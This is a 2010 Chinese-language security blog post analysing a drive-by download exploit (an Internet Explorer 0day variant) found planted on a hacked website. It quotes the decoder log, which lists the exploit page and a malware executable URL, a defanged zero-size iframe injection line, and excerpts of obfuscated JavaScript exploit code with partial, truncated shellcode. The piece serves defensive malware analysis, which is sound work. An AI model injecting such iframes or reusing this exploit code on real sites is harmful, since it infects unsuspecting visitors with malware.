Ie0dayCVE0806.c 变种网马样本分析

		当前位置：主页>安全文章>文章资料>病毒分析>文章内容

Ie0dayCVE0806.c 变种网马样本分析

来源：http://riusksk.blogbus.com 作者：泉哥发布时间：2010-11-10

Ie0day CVE 0806 .c 变种网马样本分析

分析工具：

l MDecoder v0.67http://log.mtian.net/?p=77018

l FireFox + Firebug

l OD

l VC6.0

样本来源：

l 网站 ( 温岭科学技术协会 ) 被黑客植入木马 http://log.mtian.net/?p=1172001

分析结果：

Log By Mdecoder

Log generated by anonymous use mdecoder 0.67

[root]http://www.wlkx.gov.cn/IMAGES/lzg/360se.htm

[exp]http://www.wlkx.gov.cn/IMAGES/lzg/CUTE-IE.html(Exploit.Ie0dayCVE0806.c)

[script]http://www.wlkx.gov.cn/IMAGES/lzg/pack.js

[script]http://www.wlkx.gov.cn/IMAGES/lzg/pack.css

[virus]http://dnf111.dnfcom.com/lzg.exe

[script]http://js.users.51.la/4162890.js

代码分析：

挂马方式：

典型 iframe ：

添加个#防止真的挂马了，这博客大巴上的漏洞还真不少啊！

<#iframe src=http://www.wlkx.gov.cn/IMAGES/lzg/CUTE-IE.html width=0 height=0></iframe>

Exploit 代码分析

-----------------------------------------------------Pack.js----------------------------------------------------------

     try {
            new ActiveXObject ("cuteqq" );
      }
      catch (e ) {
var ANHEI= '\x25' + 'u5' + '8' + '5' +EasyJob ;   // ANHEI = "%u5858";
var woshiahwm= "%u" ;
var anheywangma=unescape ;
}

----------------------------------------------------Pack.css --------------------------------------------------------

// Shellcode 部分

var AnHey = ANHEI +'CUTEQQ58'+'58CUTEQQ10EBCUTEQQ4B5BCUTEQQC'+ ……省略…… CUTEQQd2deCUTEQQ92d0CUTEQQc7d1CUTEQQ93daCUTEQQc5d8CUTEQQbdd8CUTEQQEAEACUTEQQEAEACUTEQQEAEACUTEQQEAEA';

----------------------------------------------------CUTE-IE.html----------------------------------------------------

id="evilcute"onclick="ahwm();"
STYLE="DISPLAY:NONE">

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·Linux后门系列--由浅入深sk13完
·Word溢出Shellcode分析
·浅谈反病毒技术的前世今生
·Web应用漏洞的大规模攻击案例分
·Ie0dayCVE0806网马样本分析
·Witty病毒通过ISS的防火墙产品和
·酷狗音乐首页隐蔽挂马详细分析+7
·Net-Worm.Win32.Dasher(黛蛇)蠕
·熊猫烧香病毒分析与解决方案
·卡巴斯基(AVP)内存驻留型病毒检
·104种木马手工清除方法
·avserve病毒初步分析

推荐广告